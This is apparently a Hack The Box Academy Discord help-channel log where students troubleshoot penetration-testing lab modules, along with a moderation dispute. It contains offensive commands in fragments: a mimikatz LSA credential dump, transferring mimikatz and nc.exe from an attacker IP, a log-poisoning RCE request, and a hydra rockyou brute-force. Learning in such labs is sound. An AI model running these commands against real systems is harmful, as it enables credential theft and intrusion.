#modules
Yeah, had some issues with SSO so i deleted the old one and made new, but now i can't identify
so this would be the good one?
that's not really intuitive when you're a noob like me x)
I think your gdb wasn't set up right
i mean it just requires a bit of learning of b16 which is definitely a useful thing to learn anyway
^ all values you're seeing in gdb are in b16
why do you say that? I haven't changed anything in my gdb
I saw that at school a long time ago
10 is a good number to know in all your bases
because it's not showing in b10 like in the module
i.e. 10 = N in baseN
how can I change that, do you know?
nope
man pages are good
I mean it doesn't really matter, if you see a-f, it's b16, if you only see numbers, it's b10
^
the step instructions being in b16 for gdb won't influence the storage output of variable
it just means you may need to change your step + to be the hex equiv to the decimal one
if you want to quickly convert hex in bash
echo $((16#<hex>)) e.g. echo $((16#a)) prints 10
ssh from windows is different from linux? "you can open a PowerShell console on MS01 and SSH to 172.16.5.225 with the credentials htb-student:HTB_@cademy_stdnt!" when i do ssh htb-student@172.16.5.225 and enter the psw it fails, what am i missing here
are you doing ssh from the windows host in powershell?
Exactly yes
then it should work
To use the secretsdump.exe
it could be that for w/e reason the clipboard isn't carrying over
doing a ping to the ip responds from the windows host
if you're trying to copy/paste
checked that as well and it's working properly
will do manually, lemme see
also it's set up to just right-click paste
what's the problem here? you can't ssh from your linux attack host?
(also adding +clipboard to your xfreerdp makes copy/paste features more stable)
they likely don't have a pivot set up
and tbh it's not strictly necessary ¯\_(ツ)_/¯
LOL i tried pivoting but everything is not possible
Tried dynamic port forwarding but couldn't
i just entered the psw manually and it worked, so weird
Thanks again marcie
Alright I'm really stuck on this AD assessment 2... I managed to get a SYSTEM shell on the SQL01 host, and the next question asks for Administrator access on MS01. I found an Admin hash in memory but trying to pass that hash has proven futile. Any tips? Am I not on the right path assuming this hash I found is the one needed?
it's him 
i now have a new thing to send to people either sarcastically or in praise
source: job hunting and one of the jobs had this as their job post name
10/10 (btw the job itself was for a business analyst)
actual
job
where did you pull the admin hash from
Question, how do i setup so i have access to the internet while connected through the vpn on my kali machine?
the vpn shouldn't affect anything
it's a split-tunnel; i think you need to go to the interface and select it though and "only use this for resources on its network" or something
plenty of people have had the same thing asked in #1024429874246590575 so maybe you can find a thread there that's been resolved and contains the answer
but it does for some reason, i can't go through to the internet
I'll take a look around
discord also has a handy search feature
Yeah, but don't know what to search for.
I ran mimikatz from the SYSTEM shell I landed in from the SQL01 host
what command
"Kali vpn internet"
||lsadump::lsa /inject||
Which gave me a hash for an Administrator user that I then tried to pass through evil-winrm, xfreerdp, CME, but nothing
https://discord.com/channels/473760315293696010/1083002697638232074 this looks to be the most comprehensive post re: no internet w/ vpn
you probably got a mscash, you won't find DA creds there, try another lsa command from mimikatz
Thanks, found it in #prolabs-dante message
mscache is the one with DC2 at the beginning right? This was definitely not that, it said NTLM hash. I'll keep trying to play around with mimikatz though
Now i found mscache v2, but I'm guessing from your answer that that's not what I'm looking for lol
check what domain it is. what's the difference between a local account and a domain account?
So is the reason I am not seeing any mimikatz.exe file in the /windows/temp directory that I might not have the right permissions?
sudo smbserver.py -smb2support CompData /usr/share/mimikatz/Win32/
PS C:\windows\system32\inetsrv> cd ../../../
PS C:\> net use \\10.10.15.20\CompData
PS C:\> copy \\10.10.15.20\CompData\mimikatz.exe \windows\temp
PS C:\> cd windows\temp
PS C:\windows\temp> dir
try adding C: before the \windows\temp\
I corrected that command and I still do not see the mimikatz.exe executable in the temp directory:
copy \\10.10.15.20\CompData\mimikatz.exe C:\windows\temp
try specifying a filename after C:\windows\temp\
i.e. C:\windows\temp\mimikatz.exe
windows is very touchy about specifying output files
also dir your own share, is the right file even there
it should be, they showed earlier that they started the smbserver from that file location
Honestly I'm at a loss, I have tried every conceivable combination of mimikatz commands (sam, secrets, etc.) and I keep getting the same NTLM hash for an Administrator account
which is the local admin account for the SQL01 host, so I understand the point of distinguishing between local and domain accounts, however I don't know how I can specify this in mimikatz
you can't, it will return whatever information it finds, in this case the DA's creds simply aren't present on that host
I've already said that you won't find DA creds there
My bad I thought when you said "try another lsa command from mimikatz" that it meant I could eventually find the needed creds there
you will find the next step, it's just not DA creds
Ah okay gotcha
use my tool if you can't figure it out, should be easier to spot
Tried that and it did not work:
sudo smbserver.py -smb2support CompData /usr/share/mimikatz/Win32
copy \\10.10.15.20\CompData\mimikatz.exe C:\windows\temp\mimikatz.exe
Also , I checked to make sure that mimikatz.exe was in the right directory.
so if you do ls -lA it shows it as "mimikatz.exe" (all lowercase?)
Doesn't show anything. Guess I am on a windows machine that doesn't allow me to see the permissions
i meant in the directory that 'has' the mimikatz file you're trying to download
alternatively dir \\ip\share\ should list
It doesn't list anything.
interesting
and if you do ls -la on YOUR system in that directory what's there
(the /usr/share/mimikatz/Win32/ directory)
the mimikatz file is there
That too
The shell you're using isn't redirecting errors to you, so you can't see what's wrong
I'm having some problems getting the flag from the module Web Enumerations. When I log in with the credentials I found I just get a white page. I checked a walkthrough cause I couldn't find any other info than the one I tried to log in with. The walkthrough used the exact same credentials, found the same way, but got a flag. Any ideas what might be the problem on my end? I'm using a VM with Parrot OS if that can be an issue?
That shouldn't be an issue, the pwnbox is a parrot vm
is it "normal" that the computers.json file does not load on the skill 1 AD ?
Just trying to transfer SharpHound for AD Skills Assessment 2, but there seems to be an issue
Hello, not sure if this is the correct chat to ask. I couldn't figure out where to put this but anyone else have troubles downloading the OVPN?
you need "/" before filename
Nvm! I think I finally got it. Had to swap the server selection
ip:port/filename
refer playlist https://www.youtube.com/watch?v=kRI_LgymWmk&list=PLhaWVsHHAWfukp27Y1XZkZF4-Jbp1X92_ for other ways to transfer
you did :port:file instead of :port/file
:P
there's a whole module re: filetransfers
which is fairly early on in the CPTS path
You will have to excuse me
What would be a proper shell in this case? a shell that has a powershell command line where I am an Administrator?
I believe the file transfers module included an additional line for error cases like this
it's a simple file transfer. I already have access.
try adding -UseBasicParsing
yes: but i'm referring specifically to the error you're receiving
You should be using -Uri in windows wget..
Example: powershell wget -Uri http://192.168.xx.xxx/nc.exe -OutFile C:\Windows\Temp\nc.exe
it doesn't matter entirely
at least not to my knowledge
the error doesn't indicate that's the issue at least
ok skill assessment 1 from ad done 🙂
Giving it a try doesn't hurt is what i think. Of course, a lot of errors does not straight away give an exact solution. But -UseBasicParsing should work as well with -Uri i think
For question four of that assessment... did you use the smbserver.py tool to transfer for the tool you needed to answer that question?
i use mounting my drives via xfreerdp or remmina
did you use an smb port to mount? did you have to refer back to your pivot module?
i use chisel and proxychains
you miss a lot without using ligolo
i will have a look into ligolo-ng soon
https://4pfsec.com/ligolo#heading-adding-a-new-route-on-proxy-server this help me a lot
Did you download ligolo-ng (using ' git clone https://github.com/nicocha30/ligolo-ng.git' ) to your attacking machine?
you might face some problems with binaries after compiling them and use them against ur targets , so it's better to use https://github.com/nicocha30/ligolo-ng/releases
Did you download what you needed directly from the website or did you use the git clone method?
get the binaries from the releases
Not sure where the binaries would be in that link
binaries are the executable files
everything in that page is a binary
you just untar the file and boom, you have a ready-to-go file
just download the file from this link , based on your arch
proxy is for your system; agent is for targets
yeeah exactly
Can you guys list some great modules that use fewer cubes?
if you are a student, then just go for the student subscription
My machine has been "terminating" for 15 mins now? What steps can i take? I have closed and ended my browser session yet it's still terminating. I have this problem only every night using an enterprise account
Anyone having problem spawning Target machine?
yup i feel like this happens everyday at this time
Same, everytime around this same time it gives me that problem
hi guys how to fix target not spawning? i changed my vpn settings and no work 😦
I believe this is day 3 or 4 that its happened to me in a row
Are the proxy and agent.exe files what you got when you unzipped the tar and zip files you downloaded?
There is no personal fix, you have to reach to HTB Academy support.
Hack the box is down not you
Just spawned target machine
if you read the filename it'll tell you what should be in it
but the reason it's failing to move is because you don't have a /tools/ligolo/ directory
mv doesn't automatically create a directory, you need to add a flag to the command for it to do so
I had already created that directory
no you have a /home/{username}/tools/ligolo directory
there's a huge difference :)
two of the options would have been either mv file tools/ligolo/ or mv file ~/tools/ligolo/
when you just tell it /tools/ligolo it's looking in the filesystem root for /tools/ (which likely doesn't exist)
this is basics of linux
use "pwd" to see the difference
attacking common services + 1 What is the password for the "mssqlsvc" user?
do i use responder to capture the hash?
||mssqlsvc::WIN-02:5410f9edd7d1aad…|| what is the ntlm hash right here
what is the last bit and middle bit?
is that full thing the hash?
you can always ask "hashid" xD
even though this type of hash is very famous
it's ntlmv2: the whole thing is considered the hash
and can be cracked with hashcat
So I took a break for a while from AD skills assessment 2, came back with some freshly brewed coffee sat down and instantly saw where I was going wrong, after I got over that hump everything else came pretty easily. That was definitely a fun Assessment
@next bronze thanks for the nudge in the right direction btw I appreciate that you didn't just spoil it and let me figure it out on my own
why is the FQDN ns.inlanefreight.htb and not root.inlanefreight.htb? why is ns.inlanefreight.htb even a FQDN? i thought it was supposed to be a subdomain?
because the second part is the contact, root@inlanefreight.htb; records will use . in place of other symbols
the true answer is in the NS and A record
both showing the answer
thank you
i'll go check it out thanks
i had issue with AD module page 35 ...
is anyone having same issue while submitting answers
I'm pretty sure he means AD skill assessment 2 it says page 35 on it
and no I had no issues submitting my answers at least
being pretty sure is one thing; but it doesn't help if we have to try and translate what module/section they're on
then further try and understand what they're trying to do
Yeah and I just remembered there are other AD modules on HTB academy so my guess could be completely wrong
you're likely right but being lazy with questions means you'll get lazy answers in response usually
Yeah fair enough
and if their issue is with an answer then it's likely they're wrong or have an extra space or plenty of other plausible things ¯\_(ツ)_/¯
I strongly suggest figuring out why invoke-webrequest (wget is just an alias) but also know that you can upload and download files in the evil-winrm shell. upload /path/to/SharpHound
gj 
Heya, I'm connected to a machine's ovpn but I cannot ping the ip, what might cause this?
could be a multitude of things
can you scan it with nmap -Pn ip?
but also if you're referring to active boxes on https://app.hackthebox.com then you're likely better off reading #welcome and asking in another channel after linking your account
Just hanging unfortunately
Hi, is it just me or do modules always require more than what is shown in the module?
Each module deals with one topic. However, prior knowledge may be necessary. Some of the modules also build on each other
depending on the module as well; they may be expecting some level of understanding of underlying concepts as well
every module details page has a blurb for example Footprinting:
A firm grasp of the following modules can be considered prerequisites for successful completion of this module:
- Linux Fundamentals
- Network Enumeration with Nmap
- Introduction to Networking
- Windows Fundamentals
Usually they're referencing other modules
but you can always check those modules to see if you know the content
for example: Network Enum with Nmap is before footprinting in the CPTS path, and the Fundamental courses are in the "Information Security Fundamentals" path that's considered a pre-requisite for CPTS
so in theory you should have a grasp of the concepts being referred to
AD Enumeration & Attacks - Skills Assessment Part II - Submit the contents of the flag.txt file on the Administrator Desktop on the MS01 host.
Can someone help me with this? I've got a rev shell with Print Spoofer exploit, got the highest privs. I've uploaded mimikatz to get the admin hash. However, when i use evil-winrm to pass the administrator NTLM hash I can't authenticate to MS01.
are you sure the hash you're finding is the admin hash for ms01
Thank you. you are correct I wasn't following any path.
and some people aren't interested in doing the paths and just wanna take the courses they're interested in
¯\_(ツ)_/¯
Thank you.
if i was sure, I wouldn't be asking for help.
Have you completed the module?
🙄 perhaps the hash you have is admin for the SQL server
if you want me to be more direct about it
Try using Bloodhound see if there's any path from SQL01 to MS01
how's it going guys, i need 57 more cubes to unlock the Using Web Proxies module, does anyone know if getting the monthly sub will unlock it or do i have to get more cubes?
monthly sub will get you the cubes any tier i think
anyone know if parrotos htb edition will update
?
htb edition isn't really maintained by HTB contrary to the name
it's maintained by parrot devs; latest edition is 6.0 download from their site
atm they don't have ARM architecture versions of the download
but they've been working on getting stuff up as soon as they get it stable
dat mean i cant sudo apt update dat shid?
if the repos are available you can, but if you're running ARM - then you're not gonna have a major update atm
also for parrot distributions it's best, for full-upgrades, to do sudo parrot-upgrade as it's a wrapper for update & upgrade that does some autocleaning once it's done
oh i c danke
Can I give you my email?
why
no
hell no
Nevermind
but also porque why?
you want to hire an elite hacker?
this isn't the channel nor server for that kind of thing
Isn't it nice that you will get the e-mail and play it?
nice
what, you want my number?
fuck no
tell me why you want to email
nvm misunderstanding
and i will email you
<@&861185840277487616> they've resorted to spamming their email now
a keylogger >:)
don't be stupid
i joke
why dont you apply for HTB staff
i have, they've said no
why
¯\_(ツ)_/¯
hell nah
i mean i can definitely be more of an asshole as not a staff member
so some more freedom of tongue there ¯\_(ツ)_/¯
💀
(✷‿✷)
What exactly is your part?
anyone with a hint for the skill assessment on the advanced XSS and CSRF module? i'm able to bypass CSP and get XSS to myself, but all my payloads that target admin seem like admin doesn't see the images, so i am missing something to make admin trigger my payloads.
thanks in advance
never give up, you should try again
did they say why tho?
thats odd
it's not uncommon LOL
HTB is company?
yes HackTheBox is a company
wait fr?
are you a pen tester irl
i thought it was like a community with profit-like goals and also education as well
they need to have some level of staff to be able to operate a support chat
buddy, i'm about to blow your mind
chess.com is a company
alr...
they have a CEO
Falcon is a part-time staff at HTB
ig u gotta...like rank up and become pentester or smth to go for staff?
no
just apply on their website
there's plenty of positions that aren't pentester positions
u sure?
yes LOL
i've looked at their positions to apply for
we're getting off-topic at this point
i would go in general but i cant link my htb account with this which is my alt discord
reach out to a mod then
only @remote latch can
im shy
you can only link your htb account to one discord account
@slender shoal can you kindly help them out 
anyway glhf on modules guys
danke u too
normally we don't bite 😉
If you need help, let me know
well.....is there way for me to link my alt to my htb account?
your main would have to be unlinked
Yeah, send me a dm
:(
like you can't have 2 discord accounts linked to the same htb account
thats sad
it's reasonable
lol it prevents impersonation attempts if someone somehow got ahold of your identifier
it's also an ease of moderation tool
allows actions to be tied to a user and action can be taken on the platform as well, depending.
imagine having enemies in htb that try to impersonate you lol
I'm pretty sure rabbits bite
or taking over an account that has a decent rank in order to shill a writeup ¯\_(ツ)_/¯
still counts as enemy
or as someone who's dodging and weaving ban evades
then the mf is simply taking the souls of others
i mean if the account is tied to you then the account can get banned ¯\_(ツ)_/¯
only if you are not nice to them
Almost two weeks to go before I attempt the AEN module, damn this was exhausting. 🙂
gj
We are almost at the same point!
😢
I wanted to ask, what's the best path to get into cyber security? I started on the Networking module first then queued up a few more like windows/linux basics etc. But i wonder would it be better to start off on the pen tester module right away?
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
the pentester path assumes you already know the basics
Well, I do and don't, but wanted to basically get a stable footing then delve deeper in the pen tester route. Learn what makes the system tick before i can start and try to exploit it.
i see
Until now I was enumerating and then going down a rabbit hole when I found something. It just dawned on me that it might be more manageable to enumerate everything I can see and make a list of creds, files of interest, etc, before I go to work on any of it. How do you guys go about starting a new network?
I found it easy to get lost when dealing with more than one host
Also... Hard Password lab kinda easy, no?
This is one of the tips mentioned several times in the CPTS path. One instance I can think of is in the Windows privesc module.
I'd say that's one of the things that's been causing my brain to melt. Especially when dealing with several users, password mutations and services. I don't know how many times I've spent ages on one service and the door was wide open on another.
This is a great course. I loved the password module
Hello, I'm having a problem with my account in htb academy wherein I changed my email account to my student email, then when I was verifying it a problem occurred, and now I can't use my account since I need to verify it, but the problem is I didn't receive any email in my student email. sorry this might be off topic for this channel, I hope you can help me. Thanks guys
Reach out to support
they need to hire real community manager(s) who are well trained and know about conflict resolution. my friend's company http://greynoise.io hired one and she's amazing. they are real game changers. if u get 55m and can't hire a cm to lube ur customers up and keep the peace but instead have someone like your buddy cloud (who is defo bad for optics. posting mod abuse pictures then saying things like "i've announced my arrival" is narcissistic and concerning - a paid cm with a proper communications and media background would N-E-V-E-R)
it's bad for optics to have a moderator who is accused of being abusive post memes about it and do narcissistic things like write, "i have to announce myself" subsequent to an emotional and dramatic exit-stage-left
Hi, I am having the same issue. Would you mind if I DM you?
that's just my opinion. as someone who isn't a kid being sold trainings and promises about an industry into which they've no insight.
also, culturally, hackers go to war over less.
know your customer.
sure!
go build -o agent cmd/agent/main.go
When you were trying to start the build process, did you get this error that's in the following screenshot:
i try to connect to tomcat manager but when i enter the credentials it won't let me into the manager page
in shells and payload live engagement
which creds are you using?
tomcat / Tomcatadm
weird, i did that yesterday and it worked
same i did it yesterday and it worked and now it won't let me in
try to change VPN
i did 😦
the only possibility is that you are inserting wrong creds
when you do insert wrong creds they redirect you to a 401 unauthorized error page
unlike when putting the right creds
im confused
yesterday while i was putting creds from https://github.com/netbiosX/Default-Credentials/blob/master/Apache-Tomcat-Default-Passwords.mdown i was receiving again and again this popup
which means that the creds were wrong
yeah true
i just wrote the password in a note, copied it and pasted it
and it worked, seems like i was putting the wrong password somehow
Jujutsu Kaisen
You need to fix your go packages
lmao bro i swear i was stuck on this live engagement for 2 days
because of internet (always disconnected network from rdp) and because i was putting the wrong pw this whole time
Yes i hated that section bc rdp connection was slow asf
i had to wait 10+ secs to write a command
frrrr
but the rest is quite chill, i completed all in 1/2 days
So I determined that the main.go is not in the path it's supposed to be in (with the /agents/main.go folder)... but I typed 'locate main.go' on my machine and a bunch of results for main.go come up... but they are all in different directories. Not sure which one to use
go build -o proxy cmd/proxy/main.go
cannot find package "cmd/proxy/main.go" in any of:
/usr/lib/go-1.19/src/cmd/proxy/main.go (from $GOROOT)
/home/htb-ac-767577/go/src/cmd/proxy/main.go (from $GOPATH)
┌─[eu-academy-1]─[10.10.15.83]─[htb-ac-767577@htb-egtfxomkph]─[~]
└──╼ [★]$ go build -o agent cmd/agent/main.go
cannot find package "cmd/agent/main.go" in any of:
/usr/lib/go-1.19/src/cmd/agent/main.go (from $GOROOT)
/home/htb-ac-767577/go/src/cmd/agent/main.go (from $GOPATH)
Module: File Inclusion
Section: Log Poisoning
Question: Try to use a different technique to gain RCE and read the flag at /
My payload:
GET /index.php?language=/var/log/apache2/access.log&cmd=cat%20/c85ee5082f4c723ace6c0796e3a3db09.txt
I have accessed the log and placed the shell in the user agent just like the module says to do, but when I use the payload above I don't see the response of the commands
damn. NetExec is a lot better for network enumeration
Just learned about nmap firewall evasion in the nmap module, so interesting with the -sA (ack scan) that the FW gets confused and does not know if a host on the internal network has initiated the connection with the external network.
hello, any ideas abt how to disable windows privileges after enabling them? for example I enable SeBackupPrivilege using the SeBackupPrivilegeCmdLets but what if I want to backtrack my actions?
in a real world scenario ?
no just playing with win PE, it's easy to enable privs but can't figure out how to disable them
hello, what is your question
ah ok in a real world scenario, hopefully your report covers it so the admins can set it back to "normal"
sorry i am bit dizzy from the skill lab 2
yeah you need always to put any changes you made in the environment in the report
Definitely the one
you can modify them in local security policy or group policy. or you can do it through the AdjustTokenPrivileges winapi
https://learn.microsoft.com/en-us/windows/win32/api/securitybaseapi/nf-securitybaseapi-adjusttokenprivileges
https://learn.microsoft.com/en-us/windows/win32/secauthz/enabling-and-disabling-privileges-in-c--
so I need to write a script or something, can't do it using cmdlets?
afaik no, either use the gui or call the winapi directly
but to call the winapi , I need to do it programmatically
correct
okay thank you
idk what you're referring to for SeBackupPrivilegeCmdLets, but you can take a look at the source code, it will be the same thing but removing instead of enabling the priv
I just used it as an example, I was wondering if there's a quick way to do it
anyone having problems with the network?
I tried copying the main.go code from the ligolo github page and creating a folder called agent(that would contain my main.go code) and the build command still did not work.
Is it even required that I even do the build command(despite that being the first step in the ligolo steps github page?). All of the video tutorials I have looked at seemed to skip this step and go directly to downloading the binaries I would need
follow this
and you need to run the go build ..... from the directory you cloned
why build it when there are precompiled binaries
no idea
the precompiled binaries are better since they will work on all the machines
I went to that link and directly downloaded the tar and zip files . so do I need to clone that link?
no just download the zip file , unzip them and you are done you can then use those binaries
Okay I did that . So I don't have to build anything.
no need
Hi I am currently on linux priv escalation Environment enumeration. I found another user ||lab_adm|| and sudo -l gave me || /bin/ncdu || but i am struggling to escalate privs, can someone point me in the right direction?
RTFM
you need to find smtg that spawns the shell
i do but i am still htb-student
you tried with sudo /bin/ncdu ?
So are these the two executables that you downloaded on your kali linux machine?
ligolo-ng_agent_0.5.2_windows_amd64.zip
ligolo-ng_proxy_0.5.2_linux_amd64.tar.gz
yes
you need to switch to the lab_adm user
i tried su lab_adm
you basically run the proxy on your attack machine , and the agent in the pivot machine
this
so I need to move the ligolo-ng_agent_0.5.2_windows_amd64.zip to my 10.129.44.2 address (ie a file transfer method)
not the .zip just the binary .exe file
is there a way that i can use ncdu to switch to lab_adm user?
the agent.exe
show me sudo -l please
sudo -u lab_adm /bin/ncdu
Hi everyone, I'm encountering a problem in the ''attacking smb'' section of the ''attacking common services'' module. https://academy.hackthebox.com/module/116/section/1167
in particular I am referring to question 3:
The last question is difficult to interpret, it says to make an ssh connection once the password has been discovered, but when I connect it tells me
jason@10.129.203.6: Permission denied (publickey).
so I thought of using smbmap -H 10.129.203.6 -u jason -p ' -password-' --download " GGJ\id_rsa"
download the rsa-id for me
and how do I use it now?
please help me when u have finished
using an id_rsa file is BASICS (heck i believe it's shown in the getting-started module)
you gotta make sure it's not world writable or readable
changing linux file permissions should be easy
I changed the permissions, 600
cloud isn't staff lol
marcieeeell
i mean not all mods are staff
basics go a long way
ahahha sometimes i am very stupid
i mean you don't need to shit talk someone to make a point
? i described behaviors and did not resort to any vulgarity or profanity
wym 'shit talk'
these events happened.
you literally talked about cloud as an example. also referring to "A real CM would N E V E R"
yes as in a professional community manager who is paid AS A JOB
and moderators aren't there to be CMs
i also used my friend company as an example that you're glossing over
i'm not glossing over that lol it's irrelevant to the point i'm making

i was making a point that a company with 55m in funding would do well to have one and citing examples of real behaviors and instances of actual professionals being used
CMs != discord mods
you are making a point absent meaningful context when you first attempt to construct a narrative and produce victims where none exist. to disregard the comparison used between the examples is not irrelevant. it's ignorant.
"meaningful context" your friend owns their own company, congrats?
different communities have different needs
no, the behaviors from a professional and a volunteer are being compared. you can not ignore the other half of the comparison marcie
I like most of the Community Staff that exist here
¯\_(ツ)_/¯
the point is, Cloud shouldn't be compared to the level of a professional my dude
you seem like you would.
he never purported to be staff
you present as someone with a stick up their arse
"This volunteer isn't as professional as someone paid to do the job," OK?
I think you're wasting your breath lol
not to mention, cloud stepped away from the server for a bit to cool off instead of remaining in and potentially doing more damage
keep calm guys, there is no need to get so heated, we are all friends and the best, if they like to help the less good, but we are and remain all friends ❤️
i'm indifferent
Clearly not
just making observations
i'm done with the newest release
"just making observations" - Calling a mod out for having a shitty moment of character rather than their behavior overall
are u done w/newest release?
maybe less chatting more hacking. there are two paths on that one which are fun to discover.
From a business aspect whether or not it was a one time thing I have to say it still has consequences
seasons are shit, maybe find another more interesting thing to point people to when you can't find a valid argument
which has/is being rectified
Cool
sure but when you use the argument that i should be exploiting more and i respond with content in the same environment which promotes exactly that, it's 'shit'
i thought it was fun not shit.
bans on average aren't just handed out easily; reportedly there were conversations with mods behind the scenes that led to some of the bans
and speaking for some of the people that got hit, it's absolutely fuckin funny considering what they've said
Oh they do nowadays
Just to save you time i dont care all that much
on average
in fact im gonna head out
Yup, that’s why I said nowadays
i'm allowed to say that behaviors which are bad for optics are indeed bad for optics. when you wear a dominos pizza uniform and hit someone with your car it's a bad look for the pizza place.
compared to a real life example of how it's done well it just escapes you and you characterize my observations as shit talking. too bad.
jinn don't be touchy
Hi guys, I'm stuck at "Information Gathering - Virtual Hosts". I got all 4 flags but can't find the last one. The question says to look for a specific vhost that starts with the letter "d". I checked all of them but don't know which one could be the right one. Any hints?
Target has been spawning for a solid 15 minutes 😭
you could have phrased your observations without calling someone out specifically
and those who know the situation will know ¯\_(ツ)_/¯
Could have, but it was fine in this case 😄
i disagree with that notion but w/e
I rarely agree with jinn, but this time I do
it just feels like taking a dig at someone instead of trying to be more general to prove a point
because being honest there have been a lot of shitty mods in the past
I’ll consider it 2 birds 1 stone
that would have been far more apt to mention rather than cloud
like cloud's outburst was a drop in the bucket for terrible behavior exhibited by mods
You’d expect at least some level of professionalism
welp tbh it's not a good argument to say there were worse mods
I just mean there were mods that actually consistently abused their mod privs
the Investigating With Splunk module was amazing
if you want to practice it on a big scale look into the free "boss of the soc" from splunk. Its a ctf that has a ton of logs from several computers over a span of weeks that you can investigate with splunk, everything from reading someones emails to checking their browsing history to ransomware execution
cool, will check it out later after i finish the soc path!
I'm having some issues with hydra in the Basic Toolkit. I'm on the skills assessment, and I'm guessing my syntax is wrong but I can't figure out where. Right now I've got: hydra -l user -P /usr/share/wordlists/rockyou.txt <IP> -s <port> http-post-form "/admin_login.php:user=^USER^&pass=^PASS^:F=<form name='log-in'"
When I run it, it says the first 16 passwords are all matches and then stops.
the :F=<form name='log-in' part at the end tells hydra how it detects a failure or success (in your case a failure, because of the "F"). what it means is "try to log in with these credentials, if you see the following in the html response its a failure: <form name='log-in'". If it detects everything as success then it means your filter in the end is wrong and it doesn't appear in an incorrect login
log-in is what I found in the source code for the name of the form, so I'm not sure where else to look to find a fail criteria
check if its really written that way, with single quotes and all that
html might also chuck some classes between form and the name=, might be easier to use some plaintext on the page
or just the string 'log-in'
So apparently my router is blocking me from sending any information through the username and password blocks because it's unencrypted. That might be the reason.
oof
Yep, that was the reason. I'm an idiot. Thanks for the help guys.
it's never DNS (it was DNS)
At least I know netgear armor does something I guess

dont hate yourself, i was trying to solve challenge for 3 continuous days until i realized i had already solved it
reading through your notes and you see the answer you wrote down 3 hours ago :(
Hey Guys, me again haha.. For the following question: "What other user in the domain has CanPSRemote rights to a host?" i'm using the provided cypher query and it always returns the same user which is not the answer..
hey guys im pretty new to hackthebox and wanted to ask if maybe anyone can help me setting up the openvpn connection to the Machines i can try to hack there, i dont know if sth on my macbook isnt set up allright or im just really blind but i cant fix it myself.. if this aint the right channel please let me know 🙂 thanks in advance
hi , did you google it before ?
pls stop being that cutie
yes ofc i did but im also following a tutorial but the weird thing is it says there should be 2 open ports when i scan it with nmap but i just find one open port (22/tcp) and thats not the one needed so i dont know where my "mistake" is
pls change your pfp it hurts me
who? lol
patrick
if you're referring to active machines or starting-point boxes there's a different channel for those
just 4 u
okay im sorry
❤️
maybe then it IS the right answer 🙂
How do I access the Academy server?
No its not, tried like 50 times lmao
both caps lock, lowercased l0l
when there are 2 , 1 its not , who could it be then ?
sometimes the questions are misleading
how tf is long password attacks module
Should just be username, mine was all lowercase, no @ if you included it
is it the part wth a user beginning with "y" ?
It always returns the user for***@inlanefreight.local and the machine being MS01
Same as the user explained in the section
link ?
the "b" one ?
sry me again... can anyone help me or tell me who would be willing in helping me in the first steps? im kinda lost
and i wrote in a wrong channel (i know) but i cant find the right one and im just looking for some help and this is what this community is for.. so please tell me what i can do or who can help me please
i tried it the whole day with youtube tutorials and the stuff on the website but it didnt work for me..
I am having issues figuring out where to go with the Attacking Common Services - Easy box. I identified the open ports on it and tried brute forcing smtp and ftp with the password list from the Resources tabs and rockyou.txt with no results. I tried brute forcing mysql with hydra but it errors out. Any help is appreciated.
no "b" user shows up
I really cant believe that i spent one entire hour and still havent figured it out, this is so frustrating man
Already crying for the Skill assessment for this module
i finished it today
because it asks for "other"
Query used: ||MATCH p1=shortestPath((u1:User)-[r1:MemberOf*1..]->(g1:Group)) MATCH p2=(u1)-[:CanPSRemote*1..]->(c:Computer) RETURN p2||
please...
In my head ive to use that query on bloodhound and expect 2 users, ||FOREND|| and the one im missing..
Try breaking it down into smaller steps, maybe get a username first
I got the email address from the nmap scan so then I started brute forcing the services.
Did you try variations of the username?
naaaaaaaaaaaaa
PASSWORD ATTACKS >>>
Password Attacks Lab - Medium>>>
Examine the second target and submit the contents of flag.txt in /root/ as the answer.
Hey all, in above question I tried using Hydra to get list of username with possible passwords but it didnt give any results. I'm not sure how else to look for a user or get to root. Can someone help/hint?
That's the one I used
again : if it shows 2 , and 1 its not, what could it be ?
I used Metasploit with the username and password lists from the module.
I was trying to use the resources/steps given through module
I'll try that and see if it works. Thanks!
every module relies on the modules before, like password lists can be mutated etc
hm? how to know which is the previous module?
or ur talking about the different parts in a module?
it was general not specific 🙂
ik its general
but previous module like?
wdym by previous module
personally what i think as previous module is for example advanced XXS and the module before is intro to web attacks
but idk what you mean
ah ok i was talking about paths
This is not the case for all of them
oh
But it’s best to keep good notes, also with users/passwords
should i keep notes about stuff i learn on htb from different modules or should i try to be the thinker and remember it all and with some practice
true 🙂
Always notes
You won’t remember everything
gonna do from now on, tnx
ik
notetaking is very important
i dont have that habit unfortunately
imma try it tho
you need to 🙂
I didn’t either, but ended up having to redo modules because of it
this guy should become a sticker
Some modules like attacking AD requires that you know some fundamentals and will list it in the module overview
Introduction To Active Directory
Linux Fundamentals
Windows Fundamentals
Setting Up
Getting Started
File Transfers
Pivoting, Tunneling, and Port Forwarding
In my opinion, the bloodhound uploaded a corrupted .zip because it aint working, i got the last question which is supposed to be the hardest one... idk, im mentally drained at this point
did you find the guy with "b" ?
isnt that tier 4 module?
AD enum and attacks isn't tier 4
message website support
ok
Need to speak to a person? Learn how to reach our support via HTB Labs.
if it's greyed out; simple question would be "are you connected to the vpn"
No bro, it only returns one user
tier 2
fair enough
AD enum and attacks is included in the CPTS path
no shit you need fundamentals for higher ranks
which does not contain any modules above tier 2
As a wise man once said "Reading the card, explains the card"
Is smtp the right service to attack or is it ftp or mysql?
My notes show using bloodhound-python, I'm assuming you did something similar?
Sharphound used, its the same i guess?
send me a screenshot via dm if you like
And you exported all into a zip and uploaded that zip?
Exactly, sharphound when executed creates the .zip, feed to bloodhound and that..
well there's a tool that allows you to enumerate usernames from one of the services
honestly having a basic checklist for some services is useful
- FTP
- can I log in as anon
- if so what can I get
I was brute forcing SMB pass there and got nothing the first time but a hit the second time with the same list. Is this something I should plan for? As in run it twice with every list? I wasted a lot of time there.
ensure you have a stable internet connection
That could be a problem 
Time for Starlink
Anonymous login isn't available :/
there is a service you can use to enumerate usernames: reread the related sections to the ports you discovered
hello i need help for module https://academy.hackthebox.com/module/24/section/514
my host ping but for topic one i can't get the flag.txt i use : php -r '$file = file_get_contents("https://10.129.225.107/flag.txt"); file_put_contents("flag.txt",$file);'
curl http://10.129.225.107/root/flag.txt | cat
but nothing
What file transfer method did you use to transfer agent.exe from your pwnbox to your windows machine?
I used the smbserver method ...but it has not been working for me.
I tried 'xcopy' this time when copying ....but it shows zero files have been transferred over. my agent.exe file is in the right directory too.
